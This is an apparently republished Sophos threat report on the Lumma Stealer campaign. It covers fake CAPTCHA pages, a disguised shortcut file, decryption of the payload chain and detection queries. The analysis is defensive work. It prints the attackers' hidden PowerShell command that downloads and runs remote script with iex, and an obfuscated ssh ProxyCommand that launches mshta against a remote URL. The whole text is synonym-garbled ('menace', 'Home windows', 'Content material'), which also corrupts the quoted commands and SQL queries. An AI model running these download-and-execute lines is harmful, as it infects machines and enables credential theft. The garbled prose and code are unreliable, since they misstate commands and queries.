In September 2024, a menace hunt throughout Sophos Managed Detection and Response\u2019s telemetry uncovered a Lumma Stealer marketing campaign utilizing faux CAPTCHA websites that instructed victims to stick a (malicious) PowerShell-encoded command into Home windows\u2019 command-line interface. Subsequent investigations allowed us to dig deeply into the mechanics of the infamous info stealer. This publish recounts these discoveries, as seen in numerous MDR investigations through the fall and winter of 2024-25.<\/p>\n

Lumma Stealer fundamentals<\/strong><\/h3>\n
Lumma Stealer has been energetic since mid-2022 and is believed to have originated with a Russian-language developer. Provided as Malware-as-a-Service (MaaS), its maintainer sells entry to the stealer by way of Telegram and provides updates and person assist. Additional info is made accessible on a devoted Gitbook website.<\/p>\n
The infostealer targets quite a lot of valuables together with passwords, session tokens, cryptocurrency wallets, and private info from compromised gadgets. The menace is amplified by its crafty supply strategies. In a single occasion, the attacker manipulated customers\u2019 belief in CAPTCHA challenges and employed social engineering ways to deceive victims searching for software program downloads. In one other, extra easy case, the person was directed to a malicious website and prompted to open a file in Home windows Explorer.<\/p>\n
The variations we noticed in Lumma Stealer conduct are vital to defenders, as a result of Lumma Stealer an infection has been extraordinarily widespread in latest months. That stated, the supply strategies we noticed may simply be tailored to different malware past Lumma Stealer, making their documentation helpful. (An inventory of IoCs will probably be made accessible on our GitHub repository<\/a>.)<\/p>\n
Our researchers are conscious of comparable work underway<\/a> from Netskope Risk Labs, together with an estimate that as many as 5,000 fake-CAPTCHA websites could also be at present concerned in a Lumma Stealer-related marketing campaign. Likewise, researchers at Qualys have completed strong analysis to element<\/a> the mechanisms Lumma Stealer has utilized in latest months. Sophos strongly recommends scrutiny of the IoCs these researchers have supplied to the general public, along with our personal.<\/p>\n
Investigation #1: The artwork(istsponsorship) of the steal<\/strong><\/h2>\n
On this investigation, the noticed assault circulate with CAPTCHA involvement was comparatively easy: The attacker creates a malicious website, \u201cprotected\u201d by a normal-looking CAPTCHA verification at hxxps[:\/\/]camplytic[.]com\/go\/cdff9f96-8cbd-4c44-b679-2f612a64cd00. The visiting person clicks on the acquainted I-am-not-a-robot field, as proven in Determine 1.<\/p>\n
$\"A$ <\/a><\/p>\n
Determine 1: A well-recognized-seeming verification field<\/em><\/p>\n
The person was subsequent redirected to a different alleged verification web page, hxxps[:\/\/]sos-at-vie-1[.]exo[.]io\/store-as\/cloudflare-new-artist[.]html, on which they\u00a0 have been requested to first load the Home windows \u201crun\u201d command, then press Cntl-V adopted by Enter, as proven in Determine 2.<\/p>\n
$\"A$ <\/a><\/p>\n
Determine 2: The subsequent \u201csafety examine\u201d request is considerably uncommon, however pretty easy for unwary customers<\/em><\/p>\n
Behind the scenes, as soon as the person pastes the PowerShell command into the Run dialog field, it triggers a hid JavaScript operate that drops a PowerShell script onto the Clipboard and runs it in a hidden window:<\/p>\n
C:WINDOWSsystem32WindowsPowerShellv1.0PowerShell.exe\" -W Hidden -command $uR= hxxps[:\/\/]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com\/new-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content material; iex $t<\/pre>\n
That script retrieves the infostealer malware from a command-and-control (C2) server, and it\u2019s off to the payload-retrieval races, as proven in Determine 3.<\/p>\n
$\"A$ <\/a><\/p>\n
Determine 3: Assault circulate with CAPTCHA abuse; notice that Lumma Stealer itself is loaded halfway via the method<\/em><\/p>\n
When run, the PowerShell script retrieves the Lumma Stealer malware from an exterior server, initiating the obtain of the primary stage of the malicious payload onto the compromised system. The command<\/p>\n
$uR=hxxps[:\/\/]fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com\/new-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content material; iex$t<\/pre>\n
retrieves the content material from the new-artist.txt file hosted on the exterior server. This content material is then processed and executed via the Invoke-Expression cmdlet.<\/p>\n
This new-artist.txt file within the code above comprises one other PowerShell script, which connects to hxxps[:\/\/]fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com\/artist[.]zip . This zipped copy of Lumma Stealer is downloaded to the goal machine, extracted into the person\u2019s %AppData% path, and saved as \u2018ArtistSponsorship.exe\u2019 (sha256:e298cd6c5fe7b9b05a28480fd215ddcbd7aaa48a) for additional execution, as proven in Determine 4.<\/p>\n
$\"The$ <\/a><\/p>\n
Determine 4: The toxic obtain<\/em><\/p>\n
The ArtistSponsorship.exe file comprises, amongst a number of dropped information as seen in Determine 5, the obfuscated AutoIt.exe script (sha256:05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7). These are dropped within the %temp% listing.<\/p>\n
$\"A$ <\/a><\/p>\n
Determine 5: A number of information dropped into %temp% by ArtistSponsorship.exe<\/em><\/p>\n
The AutoIT script does a lot of issues and consists of shellcode. Amongst its actions, it connects to the C2 area snail-r1ced[.]cyou \u2013 IP 104.21.84[.]251 (CLOUDFLARENET). Lumma Stealer then targets person knowledge, login credentials from numerous browsers, bitcoin wallets, and cookies. In Determine 6, AutoIt3.exe is accessing login knowledge and cookies utilized by the Chrome browser.<\/p>\n
$\"Log$ <\/a><\/p>\n
Determine 6: Catching AutoIT3.exe red-handed with Chrome login credentials (amongst different issues)<\/em><\/p>\n
AutoIt3.exe then executes the script X.a3x to exfiltrate the captured Chrome login knowledge and cookies to the C2 IP104.21.84[.]251(CLOUDFLARENET). Within the case we noticed, a file of simply 6.37MB \u2013 the login knowledge and cookies \u2014 was efficiently exfiltrated, after which the AutoIt3.exe course of terminated.<\/p>\n
Investigation #2: A deep dive into the code<\/strong><\/h2>\n
On this part, we\u2019ll dig way more deeply into the specifics of information and processes we encountered inside the payload supply chain. Within the case we\u2019ll look at, the person inadvertently visited an contaminated website.<\/p>\n
First, the person was prompted to open a PDF-format file in Home windows Explorer, as proven in Determine 7.<\/p>\n
$\"An$ <\/a><\/p>\n
Determine 7: The person is making an attempt to load a PDF, however that\u2019s not what\u2019s about to occur<\/em><\/p>\n
The file, apparently a PDF known as \u201cInstruction_695-18014-012_Rev.PDF,\u201d is definitely a remotely hosted .lnk (shortcut) file, as proven in Determine 8.<\/p>\n
$\"A$ <\/a><\/p>\n
Determine 8: Home windows warns that that is really a shortcut, not a PDF<\/em><\/p>\n
The shortcut file makes an attempt to execute an obfuscated PowerShell script, as proven in Determine 9.<\/p>\n
$\"A$ <\/a><\/p>\n
Determine 9: The obfuscated script within the Goal area<\/em><\/p>\n
The complete textual content of the obfuscated script is<\/p>\n
C:WindowsSystem32OpenSSHsftp.exe -o ProxyCommand=\"powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]\/]]]]]]\/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op\/W7]]]7Z9]]]].mp4]]'\u00a0 -replace ']')<\/pre>\n
When a person executes the shortcut file, sftp.exe will execute the obfuscated command via the ProxyCommand flag. Nonetheless, sftp.exe doesn\u2019t really set up the community connection itself; it delegates the duty to ssh.exe with a particular set of parameters:<\/p>\n
\"C:WindowsSystem32OpenSSHssh.exe\" \"-oForwardX11 no\" \"-oForwardAgent no\" \"-oPermitLocalCommand no\" \"-oClearAllForwardings sure\" -o \"ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]\/]]]]]]\/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op\/W7]]]7Z9]]]].mp4]]'\u00a0 -replace ']')\" \"-oProtocol 2\" -s -- . sftp .<\/pre>\n
As we see within the block of code above, the parameters exploit the \u2018ProxyCommand\u2019 possibility. ProxyCommand specifies a command to run as a substitute of connecting on to the goal host. Within the above instance, ProxyCommand is about to run PowerShell, which in flip executes mshta.exe to obtain and execute a distant script.<\/p>\n
The primary PowerShell script execution is as proven in Determine 10.<\/p>\n
$\"Hex$ <\/a><\/p>\n
Determine 10: The primary execution is revealed<\/em><\/p>\n
This script processes AES<\/a>-encrypted knowledge inside the aepcc operate, as proven in Determine 11.<\/p>\n
$\"Encryption$ <\/a><\/p>\n
Determine 11: Lumma Stealer\u2019s creators didn’t select a weak encryption algorithm<\/em><\/p>\n
In Determine 12, the AES secret is listed first. It\u2019s adopted by an initialization vector (IV) of 16 bytes of zeroes; the IV is there so as to add randomness to the beginning of the encryption course of. Regardless of that, we decrypted the info utilizing CyberChef, as proven.<\/p>\n
$\"A$ <\/a><\/p>\n
Determine 12: CyberChef begins to disclose what\u2019s happening<\/em><\/p>\n
Subsequent, we decoded the script from base64 \u2013 nearer to readable, however now a big mass of decimals, as proven in Determine 13.<\/p>\n
$\"The$ <\/a><\/p>\n
Determine 13: The script comes into higher focus<\/em><\/p>\n
The decimals in that mass of numbers are the truth is ASCII characters. An additional go by CyberChef, as proven in Determine 14, reveals that this can be a PE file, one designed to obtain additional payloads.<\/p>\n
$\"The$ <\/a><\/p>\n
Determine 14: A PE file with a single malicious goal<\/em><\/p>\n
This script performs the next actions:<\/p>\n
\n
Units variable \u2018O\u2019 equal to the C2 URL.<\/li>\n
Dynamically retrieve the \u2018Load\u2019 technique from the .NET \u2018System.Reflection.Meeting\u2019 class.
The \u2018Load\u2019 technique is then invoked on the worth of variable \u2018oQ7\u2019 (the obfuscated PE); this primarily hundreds the PE into reminiscence.<\/li>\n
As displayed above, the PE comprises a single static technique named \u2018aHdiNKuWlR\u2019. This technique downloads the content material of the URL handed to it using WebClient.
The script passes the worth of the \u2018O\u2019 variable (containing the C2 URL) to the PE loaded in reminiscence.<\/li>\n
The \u2018aHdiNKuWlR\u2019 technique outlined within the PE processes the URL handed to it by downloading its content material utilizing DownloadString.<\/li>\n
The \u2018appdataroaming\u2019 path is saved to the variable \u2018Ikmg\u2019.<\/li>\n
Perform \u2018bOje\u2019 is executed and performs the next actions:\n
\n
The operate first appends \u2018i1040gi.pdf\u2019 to the \u2018Ikmg\u2019 (file path) variable.<\/li>\n
Makes a name to operate \u2018rlYDr\u2019 and passes a novel identifier which is retrieved from the AES decrypted knowledge at place 103 with size 86, as proven in Determine 15.<\/li>\n<\/ol>\n
$\"Hex$ <\/a>
Determine 15: A hexadecimal view of the distinctive identifier<\/em><\/p>\n<\/li>\n
Checks if the \u2018appdataroamingi1040gi.pdf\u2019 path doesn’t exist.<\/li>\n
If the file path doesn’t exist, executes operate \u2018XSFbo\u2019. This operate takes two parameters:\n\n
\u2018BtPdn\u2019: This operate takes the distinctive identifier as an enter. It extracts a particular 100 characters from the AES-decrypted knowledge and makes use of it as a lookup desk to transform the distinctive identifier right into a URL. The ensuing URL is a legit PDF doc from the IRS.<\/li>\n
The second parameter is the file path in variable \u2018EVcD\u2019 as proven in Determine 16.<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n
$\"The$ <\/a><\/p>\n
Determine 16: The file path seems<\/em><\/p>\n
After decoding the URL, operate \u2018XSFbo\u2019 takes the URL and downloads the contents utilizing \u2018Web.WebClient\u2019 (which was additionally decoded utilizing \u2018BtnPdn\u2019), then\u00a0 saves the PDF to the file path laid out in variable \u2018EVcD\u2019 as proven in Determine 17.<\/p>\n
$\"Another$ <\/a><\/p>\n
Determine 17: The file path seems once more, because the save vacation spot<\/em><\/p>\n
Lastly, the PDF that was downloaded is executed, as proven in Figures 18 and 19.<\/p>\n
$\"Another$ <\/a><\/p>\n
Determine 18: There it’s\u2026<\/em><\/p>\n
$\"The$ <\/a><\/p>\n
Determine 19: \u2026and there it goes<\/em><\/p>\n
However wait! There\u2019s extra!<\/strong><\/h3>\n
To conclude this evaluation, let\u2019s hint again to the phases earlier than the benign PDF is downloaded and executed.<\/p>\n
We first seen that there was a dynamic retrieval of the \u2018Load\u2019 technique, which was used to load the embedded PE that we decoded. Then we noticed a static technique outlined contained in the PE that was being leveraged to obtain the following stage. Lastly, we see the downloaded script executed with \u2018InvokeScript\u2019. Let\u2019s concentrate on this subsequent stage.<\/p>\n
The subsequent stage that was downloaded is closely obfuscated with ineffective feedback and really lengthy variable names, as proven in Determine 20.<\/p>\n
$\"A$ <\/a><\/p>\n
Determine 20: Mooncake, pasties, fritter, ragu, kebabs, taco\u2026 clearly somebody was obfuscating on an empty abdomen<\/em><\/p>\n
As soon as de-obfuscated, we found that this script is chargeable for downloading a ultimate stage. The script options dynamic decision of low-level Home windows APIs equivalent to \u2018GetProcAddress\u2019, VirtualProtect\u2019, and \u2018AmsiInitialize\u2019.<\/p>\n
Detections<\/strong><\/h2>\n
The next queries could show helpful for defenders searching for proof of Lumma Stealer of their techniques.<\/p>\n
Establish all menace information scripts\/binaries from recognized SPIDs utilized to construct Lumma Stealer inside the final eight hours or inside a time vary:<\/p>\n
SELECT \nstrftime('%Y-%m-%d %H:%M:%S', datetime(sfj.time,'unixepoch')) dateTime,sfj.time AS epoch_time, spj.cmd_line, CASE sfj.event_type \n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 WHEN 0 THEN 'Created' \n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 WHEN 2 THEN 'Deleted' \n\u00a0\u00a0 END eventType, sfj.sophos_pid, sfj.path AS file_path, sfj.target_path, sfj.file_size, strftime('%Y-%m-%d %H:%M:%S', datetime(sfj.creation_time,'unixepoch')) birth_time_utc, strftime('%Y-%m-%d %H:%M:%S', datetime(sfj.last_write_time,'unixepoch')) modified_time_utc, spj.sid, u.username, sfj.sha256 \nFROM sophos_file_journal sfj \nLEFT JOIN sophos_process_journal spj ON sfj.sophos_pid = spj.sophos_pid \nLEFT JOIN customers u ON spj.sid = u.uuid \nWHERE \nsfj.sophos_pid IN ('', '', '', '') \nAND \nsfj.event_type IN (0, 2) \nAND \nsfj.time > strftime('%s', 'now', '-8 hour') \n--sfj.time > strftime('%s','2024-11-13 04:44:32') AND sfj.time < strftime('%s','2024-11-13 04:47:35') \n \n<\/spid4><\/spid3><\/spid2><\/spid1><\/pre>\n
Establish doable exfiltration and C2:<\/p>\n
SELECT \nstrftime('%Y-%m-%d %H:%M:%S', datetime(time,'unixepoch')) dateTime, * \nFROM sophos_process_activity \nWHERE sophos_pid IN ('', '', '', '') \nAND topic IN ('Dns','FileOtherReads', 'Ip', 'RuntimeIOCs', 'Course of', 'Community') \nAND time > strftime('%s', 'now', '-8 hour') \n--AND time > strftime('%s','2024-11-13 04:44:32') AND time < strftime('%s','2024-11-13 04:47:35')<\/spid4><\/spid3><\/spid2><\/spid1><\/pre>\n
Establish the supply URL of the faux CAPTCHA \/ verification immediate from the shopping historical past:<\/p>\n
SELECT f.path,f.listing,f.filename,f.dimension,strftime('%Y-%m-%d %H:%M:%S',datetime(f.mtime,'unixepoch')) AS modified_time_utc,strftime('%Y-%m-%d %H:%M:%S',datetime(f.atime,'unixepoch')) AS last_access_time_utc,strftime('%Y-%m-%d %H:%M:%S',datetime(f.ctime,'unixepoch')) AS change_time_utc,strftime('%Y-%m-%d %H:%M:%S',datetime(f.btime,'unixepoch')) AS birth_time_utc,attributes, h.sha256 AS SHA256, h.sha1 AS SHA1, h.md5 AS MD5 \nFROM file f LEFT JOIN hash h on f.path = h.path \nWHERE f.path LIKE 'C:UserspercentAppDataLocalGoogleChromeUser DatapercentHistory' -- Home windows historical past for Chrome \nOR f.path LIKE 'C:UserspercentAppDataLocalMicrosoftEdgeUser DatapercentHistory' -- historical past for Edge \nOR f.path LIKE 'C:UserspercentAppDataRoamingMozillaFirefoxProfilespercentplaces.sqlite' --Home windows historical past for Firefox; \nOR f.path LIKE 'C:UserspercentAppDataRoamingMozillaFirefoxProfilespercentdownloads.sqlite' --Home windows historical past for Firefox; \norder by f.mtime DESC<\/pre>\n
Conclusion<\/strong><\/h2>\n
Lumma Stealer stays a major menace as of this writing. The documented tactic of utilizing faux CAPTCHA websites to lull victims into coming into a malicious command on their very own techniques is an unpleasant twist on the state of affairs; Sophos\u2019 endpoint safety counters the menace with a spread of malware detections and behavioral-analysis ways, however educating customers to distrust CAPTCHAs, after so a few years of convincing them to reply them, is a heavy elevate. As these training efforts develop, defenders are suggested to institute applicable endpoint-detection expertise and to remember that the ways of this all-too-common infostealer proceed to evolve.<\/p>\n
Acknowledgements<\/strong><\/h3>\n
Andrew Jaeger, Nayana V R, David Whitehall, and Waldemar Stiefvater contributed assessment and constructive critique to this work.<\/p>\n
Indicators of compromise<\/strong><\/h3>\nThe IoCs compiled on this investigation are accessible<\/a> on our GitHub repository.<\/p>\n<\/p><\/div>\n\n","protected":false},"excerpt":{"rendered":"
In September 2024, a menace hunt throughout Sophos Managed Detection and Response\u2019s telemetry uncovered a Lumma Stealer marketing campaign utilizing faux CAPTCHA websites that instructed victims to stick a (malicious) PowerShell-encoded command into Home windows\u2019 command-line interface. Subsequent investigations allowed us to dig deeply into the mechanics of the infamous info stealer. This publish recounts […]<\/p>\n","protected":false},"author":2,"featured_media":2295,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58],"tags":[2257,2255,121,120,2256],"class_list":["post-2293","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-coming","tag-lumma","tag-news","tag-sophos","tag-stealer"],"_links":{"self":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/2293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2293"}],"version-history":[{"count":1,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/2293\/revisions"}],"predecessor-version":[{"id":2294,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/2293\/revisions\/2294"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/media\/2295"}],"wp:attachment":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}